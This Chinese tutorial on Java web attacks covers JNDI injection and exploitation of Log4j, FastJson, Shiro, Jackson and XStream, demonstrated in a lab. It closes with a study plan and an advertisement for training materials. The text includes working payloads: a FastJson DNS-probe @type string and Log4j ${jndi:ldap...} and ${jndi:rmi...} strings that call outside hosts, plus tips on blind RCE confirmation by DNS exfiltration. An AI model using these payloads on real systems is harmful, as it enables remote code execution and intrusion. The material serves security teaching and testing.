WEB攻防-Java安全&JNDI&RMI&LDAP&五大不安全组件&RCE执行&不出网

#知识点：
1、Java安全-RCE执行-5大类函数调用
2、Java安全-JNDI注入-RMI&LDAP&高版本
3、Java安全-不安全组件(框架)-Shiro&FastJson&Jackson&XStream&Log4j

一、演示案例-Java安全-RCE执行-5大类函数调用

1、GroovyExec

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/38cd5d41409d4497bf4ee0416285fc99.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/9a1d23247c44439f9d3416b9977e049b.png)

2、RuntimeExec

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/ec762f36a02c481086aa158b316e9288.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/e22b3092df2a4b108078b761e2f19b13.png)

3、ProcessImpl

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/ce2098ef8320400797d452e43ae33222.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/905c595e2054410a8986f475ca5f3f26.png)

4、ProcessBuilder

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/0b9849da19da46e58cf70a203a7a325c.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/3065849acefc4800aff926b4f9f1c25b.png)

5、ScriptEngineManager

检测：

黑盒看参数名和参数值

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/7ce85f7c87f94853be7a3f889009460d.png)

白盒看类函数名和可控变量(大部分白盒)

二、演示案例-Java安全-JNDI注入(RCE)-RMI&LDAP&高版本

介绍

JNDI全称为 Java Naming and
DirectoryInterface（Java命名和目录接口），是一组应用程序接口，为开发人员查找和访问各种资源提供了统一的通用接口，可以用来定义用户、网络、机器、对象和服务等各种资源。JNDI支持的服务主要有：DNS、LDAP、CORBA、RMI等。

RMI：远程方法调用注册表
LDAP：轻量级目录访问协议

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/dd79f3213d5c4026b14e9275791a1c5d.png)

调用检索：
Java为了将Object对象存储在Naming或Directory服务下，提供了Naming
Reference功能，对象可以通过绑定Reference存储在Naming或Directory服务下，比如RMI、LDAP等。javax.naming.InitialContext.lookup()

在RMI服务中调用了InitialContext.lookup()的类有：

org.springframework.transaction.jta.JtaTransactionManager.readObject()
com.sun.rowset.JdbcRowSetImpl.execute()
javax.management.remote.rmi.RMIConnector.connect()
org.hibernate.jmx.StatisticsService.setSessionFactoryJNDIName(String sfJNDIName)

在LDAP服务中调用了InitialContext.lookup()的类有：

InitialDirContext.lookup()
Spring LdapTemplate.lookup()
LdapTemplate.lookupContext()

检测：
无黑盒思路
白盒看类函数名和可控变量

靶场演示

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/27164c293f534980a79e80885189b3d4.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/dcb9a1e9c5e84824889007e6a2343ed8.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/6cb2ee1b91534f01b6e74c6758d5c026.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/aad35daf9cd24a218634498f4e790b19.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/e683259b72dd4e1a8238fc2a01f94f39.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/94f812942c214b01a2ed925785d79897.png)
jndi本身不是漏洞，是java用来远程加载文件执行从而造成一个RCE的结果，一般是在漏洞利用的时候会使用这个jndi注入达到一个RCE目的。

JDNI注入安全问题（导致RCE）

JDNI注入利用条件

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/7ea560e5d2dc48e3aa8ed27a9c3971d7.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/08b863f6e31c4c029346f961aa649a84.png)

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/c011c1c5209d4a6b9ecca62005d77a1a.png)
但是有一种情况就是对方使用了高版本的jdk，然后该工具全部的payload都不行怎么办？

高版本绕过：
https://www.mi1k7ea.com/2020/09/07/浅析高低版JDK下的JNDI注入及绕过/
https://kingx.me/Restrictions-and-Bypass-of-JNDI-Manipulations-RCE.html
可以参考这两个文章，不过都是需要从代码去分析调试跟踪，是有一定门槛的。

三、演示案例-不安全组件(框架)-Shiro&FastJson&Jackson&XStream&Log4j

1、Log4j

Apache的一个开源项目，是一个基于Java的日志记录框架。
历史漏洞：https://avd.aliyun.com/search?q=Log4j
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/dd35bbbed86e4439a0c45f3fb45e9148.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/6f5a00c923794442bee2de82eae2f4d6.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/edd2d85ad4d1485395d8d8eafcb2519e.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/ac68ce8097304b41baa77183aea711f5.png)
有个问题就是弹计算机也是在对方服务器弹，本地肯定不知道成没成功，这时候可以在jndi注入工具中把生成计算机命令改为请求一个dnslog地址来判断不就行了。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/f15ba6e2d69f48f0a33949fd1d91c186.png)

2、Shiro

Java安全框架，能够用于身份验证、授权、加密和会话管理。
历史漏洞：https://avd.aliyun.com/search?q=Shiro
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/59128da2b89e48b282aa1a2df6bc71f4.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/87f0583df75c440caf2536d0dd67be08.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/4dfaee3f793d461d97efa69b1f1836cf.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/919faafedd1a4125a675810d6767f195.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/b8b40cd1115141b6934b0e2084609f52.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/fd615a16ea20446f8c5541623e191f9c.png)

3、Jackson

当下流行的json解释器，主要负责处理Json的序列化和反序列化。
历史漏洞：https://avd.aliyun.com/search?q=Jackson
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/3e596562dcce4c2fb160a9551c01e8e6.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/cfa8fb8e0dcd4c0a9f3a70b3f6b0be10.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/8d45be41bde24eeca246496abbbeef0e.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/6d6a9d4b1c3b47be84710d902c38d79a.png)

4、FastJson

阿里巴巴公司开源的json解析器，它可以解析JSON格式的字符串，支持将JavaBean序列化为JSON字符串，也可以从JSON字符串反序列化到JavaBean。

历史漏洞：https://avd.aliyun.com/search?q=fastjson

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/c838581462ef4aeb9f7a608c54d59bba.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/5720497c4919490c8df589e9aa2d8c81.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/7d3803c151ba416d96750a71e36eb409.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/65fa355d0c864748b37ebec7c53fa84b.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/5f4346b2aefa47cf9d2fe7567607c73f.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/cb50b7598d194eab87c81ea0a646625e.png)

5、XStream

开源Java类库，能将对象序列化成XML或XML反序列化为对象
历史漏洞：https://avd.aliyun.com/search?q=XStream
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/1be47003e2104b82aa340145b9a5cdc1.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/069084fe16c6405aa6a72a615cdba752.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/2aed778786fd42d786c440761235b03f.png)

四、演示案例-白盒审计不安全组件漏洞

FastJson审计

1、源码搭建

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/272b10812e51401f8cc66d31e106f952.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/50b4d69827bc4260b30ca38902f0fdb5.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/d71f8d4a7e8743beb1dbef905ff6bb8f.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/1c3c38af836f4f65a856177375851204.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/1f54070bc1bc4538a7e0d8fea5137d2c.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/cc32e4bd89524310aadd3169f2c918f9.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/7359340c03214f24867d20fdd1d9eb6a.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/c104287c2142445e92bbf44c43193722.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/acb7d688e2614c6a95aa199743dae9ad.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/2600e0239a2c43118a717c00244d6ba2.png)

2、看引用组件版本及代码实现

漏洞函数

JSON.parse()
JSON.parseObject()

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/d0e57728e8ad454a93ea49e44dd0c67e.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/601020527d654e6086bc953089a89cda.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/e4a9706b9d664a97a0ff4b8835e03b98.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/cf02f27206ff46c79ee17fef49521dcc.png)
引用组件版本(知道版本就可以去网上找这个版本爆没爆过漏洞)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/818677757b424bb7815d27952301d7c9.png)

3、找可控变量及访问实现

admin/product propertyJson

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/1b0e313ba3534c078e517748badb37d2.png)

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/abdf9b238013424983a98609ba629915.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/0840efaf1fed4135b75da25f1acbbf03.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/ebcf70848c094663bc452c3f62b7bbad.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/247b258cf9a34586a9b43cd27961bb49.png)

4、测试出网回显调用访问

{"@type":"java.net.Inet4Address","val":"atcuqbczqs.dnstunnel.run"}

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/8fb65ed40ca84f06a367126234b2e667.png)

Log4j审计

1、看引用组件版本及实现

漏洞函数

logger.info 
logger.error

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/251101cf01a9421884f2dfeec6866432.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/8b22d751c4524ceab9e35c370282f45e.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/5e0e284ded8e4a4099c73afe898426b0.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/7ca68c5856f34be7a5b73d4af905ab72.png)

2、找可控变量及访问实现

admin/uploadAdminHeadImage originalFileName

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/61f4ac0658114cb39e21c997aa37b6d9.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/f736e870648644ed8d43c2a58f48c09d.png)
引用组件版本(知道版本就可以去网上找这个版本爆没爆过漏洞)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/ac9058d24e514be5b12e334dd85766b2.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/6521608ffee9475da2aaac8cf376d344.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/c7e53182203845da85f47379af3abdf6.png)

3、测试出网回显调用访问

${jndi:ldap://jebqzwhwtn.dnstunnel.run}

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/b0d0843b782941f5b14bbb5c4d23b3e2.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/ff5748a2346f42238d120650c1ff3a14.png)

${jndi:rmi://47.94.236.117:1099/xxxx}

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/ef23f7612d64431f8b92b7fdb9a27a60.png)
一个一个试(因为不知道源码项目用的什么java版本运行)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/45e41c5ff39f4fb4a70512fd0537cea4.png)

不回显常见判断通用方法：

1、直接将命令执行结果写入到静态资源文件里，如html、js等，然后访问。存在这个文件不就说明命令执行能够执行了。

2、通过dnslog进行数据外带，但如果无法执行dns请求就无法验证了。

接下来我将给各位同学划分一张学习计划表！

学习计划

那么问题又来了，作为萌新小白，我应该先学什么，再学什么？
既然你都问的这么直白了，我就告诉你，零基础应该从什么开始学起：

阶段一：初级网络安全工程师

接下来我将给大家安排一个为期1个月的网络安全初级计划，当你学完后，你基本可以从事一份网络安全相关的工作，比如渗透测试、Web渗透、安全服务、安全分析等岗位；其中，如果你等保模块学的好，还可以从事等保工程师。

综合薪资区间6k~15k

1、网络安全理论知识（2天）
①了解行业相关背景，前景，确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。（非常重要）

2、渗透测试基础（1周）
①渗透测试的流程、分类、标准
②信息收集技术：主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理，利用方法、工具（MSF）、绕过IDS和反病毒侦察
④主机攻防演练：MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础（1周）
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全（系统入侵排查/系统加固基础）

4、计算机网络基础（1周）
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析（HTTP、TCP/IP、ARP等）
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御：主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作（2天）
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透（1周）
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具：Nmap、BurpSuite、SQLMap、其他（菜刀、漏扫等）

那么，到此为止，已经耗时1个月左右。你已经成功成为了一名“脚本小子”。那么你还想接着往下探索吗？

阶段二：中级or高级网络安全工程师（看自己能力）

综合薪资区间15k~30k

7、脚本编程学习（4周）
在网络安全领域。是否具备编程能力是“脚本小子”和真正网络安全工程师的本质区别。在实际的渗透测试过程中，面对复杂多变的网络环境，当常用工具不能满足实际需求的时候，往往需要对现有工具进行扩展，或者编写符合我们要求的工具、自动化脚本，这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中，想要高效地使用自制的脚本工具来实现各种目的，更是需要拥有编程能力。

零基础入门的同学，我建议选择脚本语言Python/PHP/Go/Java中的一种，对常用库进行编程学习
搭建开发环境和选择IDE，PHP环境推荐Wamp和XAMPP，IDE强烈推荐Sublime；

Python编程学习，学习内容包含：语法、正则、文件、 网络、多线程等常用库，推荐《Python核心编程》，没必要看完

用Python编写漏洞的exp,然后写一个简单的网络爬虫

PHP基本语法学习并书写一个简单的博客系统

熟悉MVC架构，并试着学习一个PHP框架或者Python框架 (可选)

了解Bootstrap的布局或者CSS。

阶段三：顶级网络安全工程师

如果你对网络安全入门感兴趣，那么你需要的话可以点击这里网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！

学习资料分享

当然，只给予计划不给予学习资料的行为无异于耍流氓，这里给大家整理了一份【282G】的网络安全工程师从入门到精通的学习资料包，可点击下方二维码链接领取哦。